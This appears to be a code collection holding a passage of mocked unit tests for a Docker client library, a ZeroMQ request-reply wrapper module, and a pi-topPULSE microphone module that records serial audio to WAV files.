self.client.kill(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_dict_instead_of_id(self):
self.client.kill({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_signal(self):
self.client.kill(fake_api.FAKE_CONTAINER_ID, signal=signal.SIGTERM)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={'signal': signal.SIGTERM},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container(self):
self.client.restart(fake_api.FAKE_CONTAINER_ID, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container_with_dict_instead_of_id(self):
self.client.restart({'Id': fake_api.FAKE_CONTAINER_ID}, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container_with_dict_instead_of_id(self):
self.client.remove_container({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export(self):
self.client.export(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export_with_dict_instead_of_id(self):
self.client.export({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container(self):
self.client.inspect_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_container(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_container_stats(self):
self.client.stats(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/stats',
timeout=60,
stream=True
)
def test_container_top(self):
self.client.top(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_container_top_with_psargs(self):
self.client.top(fake_api.FAKE_CONTAINER_ID, 'waux')
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={'ps_args': 'waux'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
##################
# IMAGES TESTS #
##################
def test_pull(self):
self.client.pull('joffrey/test001')
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertFalse(args[1]['stream'])
def test_pull_stream(self):
self.client.pull('joffrey/test001', stream=True)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertTrue(args[1]['stream'])
def test_commit(self):
self.client.commit(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'commit',
data='{}',
headers={'Content-Type': 'application/json'},
params={
'repo': None,
'comment': None,
'tag': None,
'container': '3cc2351ab11b',
'author': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_image(self):
self.client.remove_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'images/e9aa60c60128',
params={'force': False, 'noprune': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_history(self):
self.client.history(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/history',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image(self):
self.client.import_image(
fake_api.FAKE_TARBALL_PATH,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': fake_api.FAKE_TARBALL_PATH
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_bytes(self):
stream = (i for i in range(0, 100))
self.client.import_image(
stream,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': '-',
},
headers={
'Content-Type': 'application/tar',
},
data=stream,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_image(self):
self.client.import_image(
image=fake_api.FAKE_IMAGE_NAME,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromImage': fake_api.FAKE_IMAGE_NAME
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image(self):
self.client.inspect_image(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_image(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_insert_image(self):
try:
self.client.insert(fake_api.FAKE_IMAGE_NAME,
fake_api.FAKE_URL, fake_api.FAKE_PATH)
except docker.errors.DeprecatedMethod:
self.assertTrue(
docker.utils.compare_version('1.12', self.client._version) >= 0
)
return
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/insert',
params={
'url': fake_api.FAKE_URL,
'path': fake_api.FAKE_PATH
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_with_tag(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(
fake_api.FAKE_IMAGE_NAME, tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': fake_api.FAKE_TAG_NAME,
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_stream(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME, stream=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image(self):
self.client.tag(fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_tag(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID,
fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': 'tag',
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_force(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME, force=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 1
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_get_image(self):
self.client.get_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/e9aa60c60128/get',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_load_image(self):
self.client.load_image('Byte Stream....')
fake_request.assert_called_with(
'POST',
url_prefix + 'images/load',
data='Byte Stream....',
timeout=DEFAULT_TIMEOUT_SECONDS
)
#################
# BUILDER TESTS #
#################
def test_build_container(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script)
def test_build_container_pull(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, pull=True)
def test_build_container_stream(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, stream=True)
def test_build_container_custom_context(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
self.client.build(fileobj=context, custom_context=True)
def test_build_container_custom_context_gzip(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
gz_context = gzip.GzipFile(fileobj=context)
self.client.build(
fileobj=gz_context,
custom_context=True,
encoding="gzip"
)
def test_build_remote_with_registry_auth(self):
self.client._auth_configs = {
'https://example.com': {
'user': 'example',
'password': 'example',
'email': 'example@example.com'
}
}
self.client.build(path='https://github.com/docker-library/mongo')
def test_build_container_with_named_dockerfile(self):
self.client.build('.', dockerfile='nameddockerfile')
def test_build_container_with_container_limits(self):
self.client.build('.', container_limits={
'memory': 1024 * 1024,
'cpusetcpus': 1,
'cpushares': 1000,
'memswap': 1024 * 1024 * 8
})
def test_build_container_invalid_container_limits(self):
self.assertRaises(
docker.errors.DockerException,
lambda: self.client.build('.', container_limits={
'foo': 'bar'
})
)
###################
# VOLUMES TESTS #
###################
@base.requires_api_version('1.21')
def test_list_volumes(self):
volumes = self.client.volumes()
self.assertIn('Volumes', volumes)
self.assertEqual(len(volumes['Volumes']), 2)
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], url_prefix + 'volumes')
@base.requires_api_version('1.21')
def test_create_volume(self):
name = 'perfectcherryblossom'
result = self.client.create_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
self.assertEqual(json.loads(args[1]['data']), {'Name': name})
@base.requires_api_version('1.21')
def test_create_volume_with_driver(self):
name = 'perfectcherryblossom'
driver_name = 'sshfs'
self.client.create_volume(name, driver=driver_name)
args = fake_request.call_args
self.assertEqual(args[0][0], 'POST')
self.assertEqual(args[0][1], url_prefix + 'volumes')
data = json.loads(args[1]['data'])
self.assertIn('Driver', data)
self.assertEqual(data['Driver'], driver_name)
@base.requires_api_version('1.21')
def test_create_volume_invalid_opts_type(self):
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts='hello=world'
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=['hello=world']
)
with pytest.raises(TypeError):
self.client.create_volume(
'perfectcherryblossom', driver_opts=''
)
@base.requires_api_version('1.21')
def test_inspect_volume(self):
name = 'perfectcherryblossom'
result = self.client.inspect_volume(name)
self.assertIn('Name', result)
self.assertEqual(result['Name'], name)
self.assertIn('Driver', result)
self.assertEqual(result['Driver'], 'local')
args = fake_request.call_args
self.assertEqual(args[0][0], 'GET')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
@base.requires_api_version('1.21')
def test_remove_volume(self):
name = 'perfectcherryblossom'
result = self.client.remove_volume(name)
self.assertTrue(result)
args = fake_request.call_args
self.assertEqual(args[0][0], 'DELETE')
self.assertEqual(args[0][1], '{0}volumes/{1}'.format(url_prefix, name))
#####################
# NETWORK TESTS #
#####################
@base.requires_api_version('1.21')
def test_create_network(self):
network_data = {
"id": 'abc12345',
"warning": "",
}
network_response = response(status_code=200, content=network_data)
post = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.post', post):
result = self.client.create_network('foo')
self.assertEqual(result, network_data)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/create')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo"})
self.client.create_network('foo', 'bridge')
self.assertEqual(
json.loads(post.call_args[1]['data']),
{"name": "foo", "driver": "bridge"})
@base.requires_api_version('1.21')
def test_remove_network(self):
network_id = 'abc12345'
delete = mock.Mock(return_value=response(status_code=200))
with mock.patch('docker.Client.delete', delete):
self.client.remove_network(network_id)
args = delete.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
@base.requires_api_version('1.21')
def test_inspect_network(self):
network_id = 'abc12345'
network_name = 'foo'
network_data = {
six.u('name'): network_name,
six.u('id'): network_id,
six.u('driver'): 'bridge',
six.u('containers'): {},
}
network_response = response(status_code=200, content=network_data)
get = mock.Mock(return_value=network_response)
with mock.patch('docker.Client.get', get):
result = self.client.inspect_network(network_id)
self.assertEqual(result, network_data)
args = get.call_args
self.assertEqual(args[0][0],
url_prefix + 'networks/{0}'.format(network_id))
@base.requires_api_version('1.21')
def test_connect_container_to_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.connect_container_to_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/connect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
@base.requires_api_version('1.21')
def test_disconnect_container_from_network(self):
network_id = 'abc12345'
container_id = 'def45678'
post = mock.Mock(return_value=response(status_code=201))
with mock.patch('docker.Client.post', post):
self.client.disconnect_container_from_network(
{'Id': container_id}, network_id)
self.assertEqual(
post.call_args[0][0],
url_prefix + 'networks/{0}/disconnect'.format(network_id))
self.assertEqual(
json.loads(post.call_args[1]['data']),
{'container': container_id})
#######################
# PY SPECIFIC TESTS #
#######################
def test_load_config_no_file(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
cfg = docker.auth.load_config(folder)
self.assertTrue(cfg is not None)
def test_load_config(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, '.dockercfg')
with open(dockercfg_path, 'w') as f:
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
f.write('auth = {0}\n'.format(auth_))
f.write('email = sakuya@scarlet.net')
cfg = docker.auth.load_config(dockercfg_path)
assert docker.auth.INDEX_NAME in cfg
self.assertNotEqual(cfg[docker.auth.INDEX_NAME], None)
cfg = cfg[docker.auth.INDEX_NAME]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_with_random_name(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder,
'.{0}.dockercfg'.format(
random.randrange(100000)))
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
json.dump(config, f)
cfg = docker.auth.load_config(dockercfg_path)
assert registry in cfg
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_load_config_custom_config_env(self):
folder = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, folder)
dockercfg_path = os.path.join(folder, 'config.json')
registry = 'https://your.private.registry.io'
auth_ = base64.b64encode(b'sakuya:izayoi').decode('ascii')
config = {
registry: {
'auth': '{0}'.format(auth_),
'email': 'sakuya@scarlet.net'
}
}
with open(dockercfg_path, 'w') as f:
json.dump(config, f)
with mock.patch.dict(os.environ, {'DOCKER_CONFIG': folder}):
cfg = docker.auth.load_config(None)
assert registry in cfg
self.assertNotEqual(cfg[registry], None)
cfg = cfg[registry]
self.assertEqual(cfg['username'], 'sakuya')
self.assertEqual(cfg['password'], 'izayoi')
self.assertEqual(cfg['email'], 'sakuya@scarlet.net')
self.assertEqual(cfg.get('auth'), None)
def test_tar_with_excludes(self):
dirs = [
'foo',
'foo/bar',
'bar',
]
files = [
'Dockerfile',
'Dockerfile.alt',
'.dockerignore',
'a.py',
'a.go',
'b.py',
'cde.py',
'foo/a.py',
'foo/b.py',
'foo/bar/a.py',
'bar/a.py',
]
exclude = [
'*.py',
'!b.py',
'!a.go',
'foo',
'Dockerfile*',
'.dockerignore',
]
expected_names = set([
'Dockerfile',
'.dockerignore',
'a.go',
'b.py',
'bar',
'bar/a.py',
])
base = make_tree(dirs, files)
self.addCleanup(shutil.rmtree, base)
with docker.utils.tar(base, exclude=exclude) as archive:
tar = tarfile.open(fileobj=archive)
assert sorted(tar.getnames()) == sorted(expected_names)
def test_tar_with_empty_directory(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'foo'])
def test_tar_with_file_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
with open(os.path.join(base, 'foo'), 'w') as f:
f.write("content")
os.makedirs(os.path.join(base, 'bar'))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
def test_tar_with_directory_symlinks(self):
base = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, base)
for d in ['foo', 'bar']:
os.makedirs(os.path.join(base, d))
os.symlink('../foo', os.path.join(base, 'bar/foo'))
with docker.utils.tar(base) as archive:
tar = tarfile.open(fileobj=archive)
self.assertEqual(sorted(tar.getnames()), ['bar', 'bar/foo', 'foo'])
#######################
# HOST CONFIG TESTS #
#######################
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
docker.errors.DockerException, self.client.create_host_config,
security_opt='wrong'
)
class StreamTest(Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
|
repliers.py
|
import zmq
from .sockets import ServerConnection
from .constants import *
import threading
def replier(address,callback,message_type):
"""
Creates a replier binding to the given address send replies.
The callback is invoked for every request received.
Args:
- address: the address to bind the REP socket to.
- callback: the callback to invoke for every message. Must accept 2 variables - message and the replier
- message_type: the type of message to receive
"""
return Replier(address,callback,message_type)
class Replier(ServerConnection):
"""
Requestor that that can respond to requests of given type
Args:
- address: the address to bind to
- callback: the callback to invoke for every request
- message_type: the type of reply to send
"""
def __init__(self,address,callback,message_type):
self._active = True
self._callback = callback
self._message_type = message_type
super(Replier,self).__init__(address,zmq.REP)
def _consume(self):
while self._active:
try:
topic, message=super(Replier,self).receive(self._message_type)
#process the message
self._callback(message,self)
except zmq.ZMQError:
pass
def start(self):
"""
Start a thread that consumes the requests and invokes the callback
"""
t=threading.Thread(target=self._consume)
t.start()
def stop(self):
"""
Stop the consumer thread
"""
self._active = False
def reply(self,message,message_type):
"""
Send a reply message of the given type
Args:
- message: the message to publish
- message_type: the type of message being sent
"""
if message_type == MULTIPART:
raise Exception("Unsupported reply type")
super(Replier,self).send(message,message_type)
|
microphone.py
|
import signal
from binascii import hexlify, unhexlify
from os import close, path, remove, rename, stat
from struct import pack
from sys import exit
from tempfile import mkstemp
from threading import Thread
from time import sleep
import serial
from pitop.common.logger import PTLogger
from pitop.pulse import configuration
_bitrate = 8
_continue_writing = False
_recording_thread = False
_thread_running = False
_exiting = False
_temp_file_path = ""
#######################
# INTERNAL OPERATIONS #
#######################
def __signal_handler(signal, frame):
"""INTERNAL.
Handles signals from the OS.
"""
global _exiting
if _exiting is False:
_exiting = True
if _thread_running is True:
stop()
PTLogger.info("\nQuitting...")
exit(0)
def __get_size(filename):
"""INTERNAL.
Gets the size of a file.
"""
file_stats = stat(filename)
return file_stats.st_size
def __from_hex(value):
"""INTERNAL.
Gets a bytearray from hex data.
"""
return bytearray.fromhex(value)
def __space_separated_little_endian(integer_value, byte_len):
"""INTERNAL.
Get an integer in format for WAV file header.
"""
if byte_len <= 1:
pack_type = "<B"
elif byte_len <= 2:
pack_type = "<H"
elif byte_len <= 4:
pack_type = "<I"
elif byte_len <= 8:
pack_type = "<Q"
else:
PTLogger.info("Value cannot be represented in 8 bytes - exiting")
exit()
hex_string = pack(pack_type, integer_value)
temp = hexlify(hex_string).decode()
return " ".join([temp[i : i + 2] for i in range(0, len(temp), 2)])
def __init_header_information():
"""INTERNAL.
Create a WAV file header.
"""
RIFF = "52 49 46 46"
WAVE = "57 41 56 45"
fmt = "66 6d 74 20"
DATA = "64 61 74 61"
if configuration.microphone_sample_rate_is_22khz():
capture_sample_rate = 22050
else:
capture_sample_rate = 16000
# ChunkID
header = __from_hex(RIFF)
# ChunkSize - 4 bytes (to be changed depending on length of data...)
header += __from_hex(__space_separated_little_endian(0, 4))
# Format
header += __from_hex(WAVE)
# Subchunk1ID
header += __from_hex(fmt)
# Subchunk1Size (PCM = 16)
header += __from_hex(__space_separated_little_endian(16, 4))
# AudioFormat (PCM = 1)
header += __from_hex(__space_separated_little_endian(1, 2))
header += __from_hex(__space_separated_little_endian(1, 2)) # NumChannels
# SampleRate
header += __from_hex(__space_separated_little_endian(capture_sample_rate, 4))
# ByteRate (Same as SampleRate due to 1 channel, 1 byte per sample)
header += __from_hex(__space_separated_little_endian(capture_sample_rate, 4))
# BlockAlign - (no. of bytes per sample)
header += __from_hex(__space_separated_little_endian(1, 2))
# BitsPerSample
header += __from_hex(__space_separated_little_endian(_bitrate, 2))
# Subchunk2ID
header += __from_hex(DATA)
# Subchunk2Size - 4 bytes (to be changed depending on length of data...)
header += __from_hex(__space_separated_little_endian(0, 4))
return header
def __update_header_in_file(file, position, value):
"""INTERNAL.
Update the WAV header
"""
hex_value = __space_separated_little_endian(value, 4)
data = unhexlify("".join(hex_value.split()))
file.seek(position)
file.write(data)
def __finalise_wav_file(file_path):
"""INTERNAL.
Update the WAV file header with the size of the data.
"""
size_of_data = __get_size(file_path) - 44
if size_of_data <= 0:
PTLogger.info("Error: No data was recorded!")
remove(file_path)
else:
with open(file_path, "rb+") as file:
PTLogger.debug("Updating header information...")
__update_header_in_file(file, 4, size_of_data + 36)
__update_header_in_file(file, 40, size_of_data)
def __thread_method():
"""INTERNAL.
Thread method.
"""
__record_audio()
def __record_audio():
"""INTERNAL.
Open the serial port and capture audio data into a temp file.
"""
global _temp_file_path
temp_file_tuple = mkstemp()
close(temp_file_tuple[0])
_temp_file_path = temp_file_tuple[1]
if path.exists("/dev/serial0"):
PTLogger.debug("Opening serial device...")
serial_device = serial.Serial(
port="/dev/serial0",
timeout=1,
baudrate=250000,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
)
serial_device_open = serial_device.isOpen()
if serial_device_open is True:
try:
PTLogger.debug("Start recording")
with open(_temp_file_path, "wb") as file:
PTLogger.debug("WRITING: initial header information")
file.write(__init_header_information())
if serial_device.inWaiting():
PTLogger.debug("Flushing input and starting from scratch")
serial_device.flushInput()
PTLogger.debug("WRITING: wave data")
while _continue_writing:
while not serial_device.inWaiting():
sleep(0.01)
audio_output = serial_device.read(serial_device.inWaiting())
bytes_to_write = bytearray()
for pcm_data_block in audio_output:
if _bitrate == 16:
pcm_data_int = 0
pcm_data_int = pcm_data_block
scaled_val = int((pcm_data_int * 32768) / 255)
bytes_to_write += __from_hex(
__space_separated_little_endian(scaled_val, 2)
)
else:
pcm_data_int = pcm_data_block
bytes_to_write += __from_hex(
__space_separated_little_endian(pcm_data_int, 1)
)
file.write(bytes_to_write)
sleep(0.1)
finally:
serial_device.close()
__finalise_wav_file(_temp_file_path)
PTLogger.debug("Finished Recording.")
else:
PTLogger.info("Error: Serial port failed to open")
else:
PTLogger.info("Error: Could not find serial port - are you sure it's enabled?")
#######################
# EXTERNAL OPERATIONS #
#######################
def record():
"""Start recording on the pi-topPULSE microphone."""
global _thread_running
global _continue_writing
global _recording_thread
if not configuration.mcu_enabled():
PTLogger.info("Error: pi-topPULSE is not initialised.")
exit()
if _thread_running is False:
_thread_running = True
_continue_writing = True
_recording_thread = Thread(group=None, target=__thread_method)
_recording_thread.start()
else:
PTLogger.info("Microphone is already recording!")
def is_recording():
"""Returns recording state of the pi-topPULSE microphone."""
return _thread_running
def stop():
"""Stops recording audio."""
global _thread_running
global _continue_writing
_continue_writing = False
_recording_thread.join()
_thread_running = False
def save(file_path, overwrite=False):
"""Saves recorded audio to a file."""
global _temp_file_path
if _thread_running is False:
if _temp_file_path != "" and path.exists(_temp_file_path):
if path.exists(file_path) is False or overwrite is True:
if path.exists(file_path):
remove(file_path)
rename(_temp_file_path, file_path)
_temp_file_path = ""
